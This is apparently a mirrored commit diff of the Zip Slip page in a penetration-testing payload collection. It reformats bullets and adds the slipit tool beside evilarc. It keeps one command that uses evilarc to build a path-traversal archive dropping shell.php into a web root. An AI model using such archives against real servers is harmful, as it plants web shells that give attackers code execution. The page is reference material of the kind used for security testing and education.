mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-18 17:28:49 +00:00
Zip Slip: Add slipit to tools
This commit is contained in:
parent
bbe4bbce05
commit
950114b9e6
@ -4,11 +4,11 @@
|
|||||||
|
|
||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
- [Detection](#detection)
|
* [Detection](#detection)
|
||||||
- [Tools](#tools)
|
* [Tools](#tools)
|
||||||
* [Exploits](#exploits)
|
* [Exploits](#exploits)
|
||||||
* [Basic Exploit](#basic-exploit)
|
* [Basic Exploit](#basic-exploit)
|
||||||
- [Additional Notes](#additional-notes)
|
* [Additional Notes](#additional-notes)
|
||||||
|
|
||||||
## Detection
|
## Detection
|
||||||
|
|
||||||
@ -16,12 +16,14 @@
|
|||||||
|
|
||||||
## Tools
|
## Tools
|
||||||
|
|
||||||
- evilarc [https://github.com/ptoomey3/evilarc](https://github.com/ptoomey3/evilarc)
|
- [evilarc](https://github.com/ptoomey3/evilarc)
|
||||||
|
- [slipit](https://github.com/usdAG/slipit)
|
||||||
|
|
||||||
## Exploits
|
## Exploits
|
||||||
|
|
||||||
### Basic Exploit
|
### Basic Exploit
|
||||||
|
|
||||||
|
Using evilarc:
|
||||||
```python
|
```python
|
||||||
python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15
|
python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15
|
||||||
```
|
```
|
||||||
|
Loading…
Reference in New Issue
Block a user